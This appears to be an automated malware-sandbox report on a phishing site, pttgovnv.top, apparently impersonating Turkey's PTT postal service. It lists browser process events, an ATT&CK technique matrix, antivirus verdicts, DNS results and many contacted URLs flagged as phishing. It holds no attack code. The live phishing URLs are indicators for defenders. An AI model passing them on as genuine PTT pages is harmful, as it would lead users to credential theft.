Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pttgovnv.top/help/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=1988,i,3916149718589674385,9428878303395557507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://pttgovnv.top/help/100%Avira URL Cloudphishing
https://pttgovnv.top/help/18%VirustotalBrowse
https://pttgovnv.top/help/100%SlashNextFraudulent Website type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
www.google.com0%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
pttgovnv.top4%VirustotalBrowse
www.ptt.gov.tr0%VirustotalBrowse
chatserver.alo-tech.com0%VirustotalBrowse
netdna.bootstrapcdn.com0%VirustotalBrowse
a.nel.cloudflare.com0%VirustotalBrowse
pttem.alo-tech.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
https://fontawesome.com0%URL Reputationsafe
http://www.opensource.org/licenses/mit-license.php0%URL Reputationsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=-SnapXukcxVrNsxsBQUE100%Avira URL Cloudphishing
https://fontawesome.com/license/free0%URL Reputationsafe
http://daneden.me/animate0%URL Reputationsafe
https://a.nel.cloudflare.com/report/v4?s=bES%2BYmxVOLAy8WHKBoK%2BDItRXc2UqkVtWzPWNTBY5rkX2GyP%2B3DTJKXGjbw5FEkjxU%2FviKP0HM39CcY3kgdQKIn%2FjFjZcooPhhcdwYSkKyEBfVi6RcfMviHBQyD%2FzaI%3D0%Avira URL Cloudsafe
https://www.ptt.gov.tr/_next/static/chunks/pages/_error-32d9baaae5c99c79.js0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRdk&sid=psKQgyFLGrrSy6S3BQUX100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLz4&sid=HJNOcZ3ULtSedHtaBQT_100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSfo&sid=6Pzg8-8CUphQpNENBQUa100%Avira URL Cloudphishing
https://pttgovnv.top/api/MC4zMTIwODY0MDU2MjE5NDY4100%Avira URL Cloudphishing
https://chatserver.alo-tech.com/static/assets/js/ua-parser.min.js0%Avira URL Cloudsafe
https://pttgovnv.top/help/layout/images/39.png100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/77985128JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/8b4af40ckFGym.css100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPXR&sid=Jgob5dOCMvYo_mojBQUR100%Avira URL Cloudphishing
https://pttem.alo-tech.com/storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=true0%Avira URL Cloudsafe
http://creativecommons.org/licenses/by/3.0/0%Avira URL Cloudsafe
https://pttgovnv.top/help/layout/images/47.png100%Avira URL Cloudphishing
https://service-edge.alo-tech.com/static/images/chat-icon.svg0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVXF&sid=M3Npq313xU4h1v3KBQUg100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPjD&sid=Jgob5dOCMvYo_mojBQUR100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQUL100%Avira URL Cloudphishing
http://twitter.com/fontawesome.0%Avira URL Cloudsafe
https://chatserver.alo-tech.com/static/assets/img/microphone_open.svg0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liQtD&sid=HHxSQQKw-ZFDRlk7BQUU100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOuY&sid=6dVwkVmS0CuJG3kJBQUL100%Avira URL Cloudphishing
http://creativecommons.org/licenses/by/3.0/0%VirustotalBrowse
https://pttgovnv.top/help/assets/c27b6911JxKnW.js100%Avira URL Cloudphishing
http://twitter.com/fontawesome.0%VirustotalBrowse
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=Jgob5dOCMvYo_mojBQUR100%Avira URL Cloudphishing
http://getbootstrap.com)0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liTio100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWNm100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liatI100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=QB7JMh6ogzHtMo_gBQUs100%Avira URL Cloudphishing
https://www.ptt.gov.tr/_next/static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.js0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/4cd1ec68kFGym.css100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWjb&sid=xdKg7EXtPfKxJvHtBQUj100%Avira URL Cloudphishing
https://pttem.alo-tech.com/chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t0%Avira URL Cloudsafe
https://pttgovnv.top/help/layout/images/32.png100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6lica0&sid=qmawR9H0vci5rE9hBQUv100%Avira URL Cloudphishing
https://www.ptt.gov.tr/_next/static/css/1c210f4a3e94a33a.css0%Avira URL Cloudsafe
http://kyruus.com0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6licMl&sid=qmawR9H0vci5rE9hBQUv100%Avira URL Cloudphishing
https://chatserver.alo-tech.com/static/assets/css/google_fonts.css0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/164f9b57JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWje&sid=xdKg7EXtPfKxJvHtBQUj100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPXX&sid=Jgob5dOCMvYo_mojBQUR100%Avira URL Cloudphishing
https://chatserver.alo-tech.com/static/assets/img/down_button.svg0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLtF&sid=HJNOcZ3ULtSedHtaBQT_100%Avira URL Cloudphishing
https://www.ptt.gov.tr/_next/static/media/fa-solid-900.ce4938a3.woff20%Avira URL Cloudsafe
https://www.ptt.gov.tr/_next/static/JxrWbfN16VK5LXe_vQYf2/_ssgManifest.js0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/8560f9bdkFGym.woff100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=psKQgyFLGrrSy6S3BQUX100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liNOP&sid=YADBSRy9yTc5Jzd9BQUI100%Avira URL Cloudphishing
https://pttgovnv.top/help/layout/images/43.png100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liaGK&sid=NtB8sH50cFJwILuEBQUp100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liYKN&sid=fJmUnpo66zoSBdWxBQUm100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liMdh&sid=-SnapXukcxVrNsxsBQUE100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=qmawR9H0vci5rE9hBQUv100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=6dVwkVmS0CuJG3kJBQUL100%Avira URL Cloudphishing
https://pttgovnv.top/help/layout/images/52.png100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSE9100%Avira URL Cloudphishing
https://pttgovnv.top/help/layout/images/35.png100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.js100%Avira URL Cloudphishing
http://ianlunn.co.uk/0%Avira URL Cloudsafe
https://github.com/twbs/bootstrap/blob/master/LICENSE)0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/f4397cedkFGym.css100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6lib3N&sid=QB7JMh6ogzHtMo_gBQUs100%Avira URL Cloudphishing
https://github.com/IanLunn/Hover0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liP4B&sid=6dVwkVmS0CuJG3kJBQUL100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/f6170fbbkFGym.css100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/cbcdcea5JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/help/layout/images/38.png100%Avira URL Cloudphishing
https://pttgovnv.top/help/assets/37d8eb31JxKnW.js100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVkz&sid=M3Npq313xU4h1v3KBQUg100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6libQf&sid=QB7JMh6ogzHtMo_gBQUs100%Avira URL Cloudphishing
https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr0%Avira URL Cloudsafe
https://pttgovnv.top/help/assets/f18e42bakFGym.woff100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUI100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=YADBSRy9yTc5Jzd9BQUI100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPMv100%Avira URL Cloudphishing
https://i.pinimg.com/originals/59/55/6a/59556a0f715ae387ae807f4fda9f7f97.png)0%Avira URL Cloudsafe
https://pttgovnv.top/help/frames/0/index.html100%Avira URL Cloudphishing
http://www.dardenstudio.com/http://www.dardenstudio.com/http://typekit.com/eulas/00000000000000000000%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liZcA100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liV9d100%Avira URL Cloudphishing
https://ismail-develop.alo-tech.com/v2/tr/images/more_vert.svg0%Avira URL Cloudsafe
https://www.ptt.gov.tr/_next/static/css/6243e9b9a276eab5.css0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liL4Q100%Avira URL Cloudphishing
https://chatserver.alo-tech.com/static/assets/js/linkify.html.min.js0%Avira URL Cloudsafe
https://pttgovnv.top/help/layout/images/44.png100%Avira URL Cloudphishing
https://pttem.alo-tech.com/chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t0%Avira URL Cloudsafe
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liY09&sid=fJmUnpo66zoSBdWxBQUm100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRRl&sid=psKQgyFLGrrSy6S3BQUX100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRoX&sid=psKQgyFLGrrSy6S3BQUX100%Avira URL Cloudphishing
https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPj7&sid=Jgob5dOCMvYo_mojBQUR100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
lb-p3.alo-tech.com
35.201.78.44
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalseunknown
    netdna.bootstrapcdn.com
    104.18.10.207
    truefalseunknown
    chat-server.alo-tech.com
    34.107.233.18
    truefalse
      unknown
      pttgovnv.top
      172.67.174.217
      truefalseunknown
      www.google.com
      142.250.185.132
      truefalseunknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalseunknown
      www.ptt.gov.tr
      185.220.152.26
      truefalseunknown
      chatserver.alo-tech.com
      unknown
      unknownfalseunknown
      pttem.alo-tech.com
      unknown
      unknownfalseunknown
      service-edge.alo-tech.com
      unknown
      unknownfalse
        unknown
        NameMaliciousAntivirus DetectionReputation
        https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=-SnapXukcxVrNsxsBQUEtrue
        • Avira URL Cloud: phishing
        unknown
        https://a.nel.cloudflare.com/report/v4?s=bES%2BYmxVOLAy8WHKBoK%2BDItRXc2UqkVtWzPWNTBY5rkX2GyP%2B3DTJKXGjbw5FEkjxU%2FviKP0HM39CcY3kgdQKIn%2FjFjZcooPhhcdwYSkKyEBfVi6RcfMviHBQyD%2FzaI%3Dfalse
        • Avira URL Cloud: safe
        unknown
        https://www.ptt.gov.tr/_next/static/chunks/pages/_error-32d9baaae5c99c79.jsfalse
        • Avira URL Cloud: safe
        unknown
        https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRdk&sid=psKQgyFLGrrSy6S3BQUXfalse
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLz4&sid=HJNOcZ3ULtSedHtaBQT_false
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSfo&sid=6Pzg8-8CUphQpNENBQUafalse
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/api/MC4zMTIwODY0MDU2MjE5NDY4false
        • Avira URL Cloud: phishing
        unknown
        https://chatserver.alo-tech.com/static/assets/js/ua-parser.min.jsfalse
        • Avira URL Cloud: safe
        unknown
        https://pttgovnv.top/help/layout/images/39.pngtrue
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/help/assets/77985128JxKnW.jstrue
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/help/assets/8b4af40ckFGym.csstrue
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPXR&sid=Jgob5dOCMvYo_mojBQURfalse
        • Avira URL Cloud: phishing
        unknown
        https://pttem.alo-tech.com/storage/media?gcs_file_name=chat/chat_icons/3af51a49-058b-4e67-9af9-1575813efeeb.png&chat_icon=truefalse
        • Avira URL Cloud: safe
        unknown
        https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVXF&sid=M3Npq313xU4h1v3KBQUgfalse
        • Avira URL Cloud: phishing
        unknown
        https://pttgovnv.top/help/layout/images/47.pngtrue
        • Avira URL Cloud: phishing
        unknown
        https://www.ptt.gov.tr/Sayfalar/Kargo/PttYurtIciKargoHizmetleri.aspxfalse
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPjD&sid=Jgob5dOCMvYo_mojBQURfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQULfalse
          • Avira URL Cloud: phishing
          unknown
          https://chatserver.alo-tech.com/static/assets/img/microphone_open.svgfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liQtD&sid=HHxSQQKw-ZFDRlk7BQUUfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liOuY&sid=6dVwkVmS0CuJG3kJBQULfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/assets/c27b6911JxKnW.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=Jgob5dOCMvYo_mojBQURfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liTiofalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWNmfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liatIfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=QB7JMh6ogzHtMo_gBQUsfalse
          • Avira URL Cloud: phishing
          unknown
          https://www.ptt.gov.tr/_next/static/chunks/pages/doviz-kurlari-c5ba2bb9e7f07c80.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/help/assets/4cd1ec68kFGym.csstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWjb&sid=xdKg7EXtPfKxJvHtBQUjfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttem.alo-tech.com/chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29tfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/help/layout/images/32.pngtrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6lica0&sid=qmawR9H0vci5rE9hBQUvfalse
          • Avira URL Cloud: phishing
          unknown
          https://www.ptt.gov.tr/_next/static/css/1c210f4a3e94a33a.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6licMl&sid=qmawR9H0vci5rE9hBQUvfalse
          • Avira URL Cloud: phishing
          unknown
          https://chatserver.alo-tech.com/static/assets/css/google_fonts.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/help/assets/164f9b57JxKnW.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liWje&sid=xdKg7EXtPfKxJvHtBQUjfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPXX&sid=Jgob5dOCMvYo_mojBQURfalse
          • Avira URL Cloud: phishing
          unknown
          https://chatserver.alo-tech.com/static/assets/img/down_button.svgfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLtF&sid=HJNOcZ3ULtSedHtaBQT_false
          • Avira URL Cloud: phishing
          unknown
          https://www.ptt.gov.tr/_next/static/JxrWbfN16VK5LXe_vQYf2/_ssgManifest.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://www.ptt.gov.tr/_next/static/media/fa-solid-900.ce4938a3.woff2false
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/help/assets/8560f9bdkFGym.wofftrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=psKQgyFLGrrSy6S3BQUXfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liNOP&sid=YADBSRy9yTc5Jzd9BQUIfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/layout/images/43.pngtrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liaGK&sid=NtB8sH50cFJwILuEBQUpfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liYKN&sid=fJmUnpo66zoSBdWxBQUmfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liMdh&sid=-SnapXukcxVrNsxsBQUEfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=qmawR9H0vci5rE9hBQUvfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=6dVwkVmS0CuJG3kJBQULfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/layout/images/52.pngtrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liSE9false
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/layout/images/35.pngtrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/assets/f3c7e6fbJxKnW.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/assets/f4397cedkFGym.csstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6lib3N&sid=QB7JMh6ogzHtMo_gBQUsfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liP4B&sid=6dVwkVmS0CuJG3kJBQULfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liLtD&sid=HJNOcZ3ULtSedHtaBQT_false
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/assets/f6170fbbkFGym.csstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/assets/cbcdcea5JxKnW.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/layout/images/38.pngtrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/assets/37d8eb31JxKnW.jstrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liVkz&sid=M3Npq313xU4h1v3KBQUgfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6libQf&sid=QB7JMh6ogzHtMo_gBQUsfalse
          • Avira URL Cloud: phishing
          unknown
          https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/help/assets/f18e42bakFGym.wofftrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liNah&sid=YADBSRy9yTc5Jzd9BQUIfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=websocket&sid=YADBSRy9yTc5Jzd9BQUIfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liPMvfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/help/frames/0/index.htmltrue
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liZcAfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liV9dfalse
          • Avira URL Cloud: phishing
          unknown
          https://www.ptt.gov.tr/_next/static/css/6243e9b9a276eab5.cssfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liL4Qfalse
          • Avira URL Cloud: phishing
          unknown
          https://chatserver.alo-tech.com/static/assets/js/linkify.html.min.jsfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/help/layout/images/44.pngtrue
          • Avira URL Cloud: phishing
          unknown
          https://pttem.alo-tech.com/chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29tfalse
          • Avira URL Cloud: safe
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liY09&sid=fJmUnpo66zoSBdWxBQUmfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRRl&sid=psKQgyFLGrrSy6S3BQUXfalse
          • Avira URL Cloud: phishing
          unknown
          https://pttgovnv.top/socket.io/?EIO=4&transport=polling&t=P6liRoX&sid=psKQgyFLGrrSy6S3BQUXfalse
